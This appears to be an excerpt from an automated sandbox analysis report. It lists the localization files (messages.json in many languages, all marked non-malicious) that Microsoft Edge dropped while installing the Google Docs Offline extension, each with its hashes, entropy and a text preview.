Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7668_187929937\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
